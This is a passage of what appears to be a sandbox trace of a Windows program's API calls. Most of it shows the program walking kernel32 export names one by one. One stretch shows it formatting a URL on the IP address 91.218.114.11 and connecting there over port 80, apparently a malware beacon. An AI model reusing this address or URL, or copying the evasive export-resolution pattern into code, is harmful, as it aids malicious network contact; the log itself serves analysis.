22 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0178.776] lstrlenA (lpString="DEBUGBREAK") returned 10 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0178.776] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0178.776] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0178.776] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0178.777] lstrlenA (lpString="DECODEPOINTER") returned 13 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0178.777] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0178.777] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0178.777] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0178.777] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0178.777] lstrlenA (lpString="DELETEATOM") returned 10 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0178.777] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0178.777] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0178.777] lstrlenA (lpString="DELETEFIBER") returned 11 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0178.777] lstrlenA (lpString="DELETEFILEA") returned 11 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0178.777] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0178.777] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0178.777] lstrlenA (lpString="DELETEFILEW") returned 11 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0178.777] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0178.777] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0178.777] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0178.777] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0178.777] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0178.777] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0178.777] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0178.778] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0178.778] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0178.778] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0178.778] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0178.778] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0178.778] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0178.778] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0178.778] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0178.778] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0178.778] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0178.778] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0178.778] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0178.778] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0178.778] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0178.778] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0178.778] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0178.778] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0178.778] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0178.778] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0178.778] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0178.779] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0178.779] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0178.779] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0178.779] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0178.779] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0178.779] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0178.779] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0178.779] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0178.779] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0178.779] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0178.779] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0178.779] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0178.779] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0178.779] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0178.779] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0178.779] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0178.779] wsprintfA (in: param_1=0x5c0000, param_2="http://%s%s" | out: param_1="http://91.218.114.11/content/c.jsp?wk=56t2&sq=m4cr2&ud=45wlw01t") returned 63 [0178.779] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x610000 [0178.779] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x620000 [0178.780] VirtualAlloc (lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x4) returned 0x630000 [0178.780] VirtualAlloc (lpAddress=0x0, dwSize=0x39, flAllocationType=0x3000, flProtect=0x4) returned 0x640000 [0178.780] inet_pton (in: Family=2, pszAddrString="91.218.114.11", pAddrBuf=0x31cf30c | out: pAddrBuf=0x31cf30c) returned 1 [0178.780] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x31cf758 | out: lpWSAData=0x31cf758) returned 0 [0178.784] socket (af=2, type=1, protocol=6) returned 0x21c [0178.786] inet_addr (cp="91.218.114.11") returned 0xb72da5b [0178.786] htons (hostshort=0x50) returned 0x5000 [0178.786] connect (s=0x21c, name=0x31cf2e8*(sa_family=2, sin_port=0x50, sin_addr="91.218.114.11"), namelen=16) returned 0 [0178.840] lstrlenA (lpString="kernel32.dll") returned 12 [0178.840] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.840] lstrcpyA (in: lpString1=0x31ce648, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.840] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.840] lstrcpyA (in: lpString1=0x31ce648, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.840] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.840] lstrcpyA (in: lpString1=0x31ce648, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.840] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.840] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.840] lstrlenA (lpString="ADDATOMA") returned 8 [0178.840] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.840] lstrlenA (lpString="ADDATOMW") returned 8 [0178.840] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.840] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.840] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.840] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.840] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.840] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.840] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.840] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.840] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.840] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.840] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.840] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.840] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.840] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.840] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.841] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.841] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.841] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.841] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.841] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.841] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.841] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.841] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.841] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.841] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.841] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.841] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.841] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.841] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.841] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.841] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.841] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.841] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.841] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.841] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.842] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.842] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.842] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.842] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.842] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.842] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.842] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.842] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.842] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.842] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.842] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.842] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.842] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.842] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.842] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.842] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.842] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.842] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.842] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.842] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.843] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.843] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.843] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.843] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.843] lstrlenA (lpString="BEEP") returned 4 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.843] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.843] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.843] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.843] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.843] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.843] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.843] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.843] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.843] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.843] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.843] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.843] lstrlenA (lpString="CANCELIO") returned 8 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.843] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelSynchronousIo" | out: 